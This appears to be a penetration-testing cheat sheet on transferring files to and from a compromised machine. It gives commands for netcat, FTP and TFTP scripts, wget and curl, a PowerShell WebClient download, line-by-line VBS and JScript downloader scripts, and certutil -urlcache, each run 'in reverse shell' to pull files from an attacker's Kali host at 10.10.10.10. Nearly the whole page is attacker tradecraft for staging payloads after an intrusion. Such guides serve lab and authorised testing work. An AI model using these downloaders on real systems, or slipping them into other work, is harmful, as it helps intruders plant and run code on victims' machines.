File Transferring

Via NetCat

1
#On the Receiving Machine
2
nc -l -p 9999 > received_file.txt
3
​
4
#On the Sending Machine
5
nc 10.10.10.10 9999 < received_file.txt
Copied!

Via FTP

This is especially useful for non-interactive Windows reverse shells
1
# In Kali
2
pip install pyftplib
3
python -m pyftpdlib -p 21 -w
4
​
5
# In reverse shell
6
echo open 10.10.10.10 > ftp.txt
7
echo USER anonymous >> ftp.txt
8
echo ftp >> ftp.txt
9
echo bin >> ftp.txt
10
echo GET file >> ftp.txt
11
echo bye >> ftp.txt
12
​
13
# Execute
14
ftp -v -n -s:ftp.txt
Copied!

Via TFTP

1
# In Kali
2
atftpd --daemon --port 69 /tftp
3
​
4
# In reverse shell
5
tftp -i 10.10.10.10 GET file.txt
Copied!

Via HTTP

  • Using basic commands
1
# In Kali
2
python -m SimpleHTTPServer 80
3
​
4
# In reverse shell - Linux
5
wget 10.10.10.10/file
6
curl 10.10.10.10/file
7
​
8
# In reverse shell - Windows
9
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.10.10/file.exe','C:\Users\user\Desktop\file.exe')"
Copied!
  • Using VBS on a Windows reverse shell
1
# In reverse shell
2
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
3
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
4
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
5
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
6
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
7
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
8
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
9
echo Err.Clear >> wget.vbs
10
echo Set http = Nothing >> wget.vbs
11
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
12
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
13
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
14
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
15
echo http.Open "GET",strURL,False >> wget.vbs
16
echo http.Send >> wget.vbs
17
echo varByteArray = http.ResponseBody >> wget.vbs
18
echo Set http = Nothing >> wget.vbs
19
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
20
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
21
echo strData = "" >> wget.vbs
22
echo strBuffer = "" >> wget.vbs
23
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
24
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
25
echo Next >> wget.vbs
26
echo ts.Close >> wget.vbs
27
​
28
# Execute
29
cscript wget.vbs http://10.10.10.10/file.exe file.exe
Copied!
  • Using javascript on a Windows reverse shell
1
# In Kali
2
python -m SimpleHTTPServer 80
3
​
4
# In reverse shell
5
echo var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); >> wget.js
6
echo WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false); >> wget.js
7
echo WinHttpReq.Send(); >> wget.js
8
echo BinStream = new ActiveXObject("ADODB.Stream"); >> wget.js
9
echo BinStream.Type = 1; >> wget.js
10
echo BinStream.Open(); >> wget.js
11
echo BinStream.Write(WinHttpReq.ResponseBody); >> wget.js
12
echo BinStream.SaveToFile("file.txt"); >> wget.js
13
​
14
cscript /nologo wget.js http://10.10.10.10/file.txt
Copied!
  • Using Certutil on a Windows reverse shell
1
# In Kali
2
python -m SimpleHTTPServer 80
3
​
4
# In reverse shell
5
certutil.exe -urlcache -split -f "http://10.10.10.10/file.txt" file.txt
Copied!
Last modified 1yr ago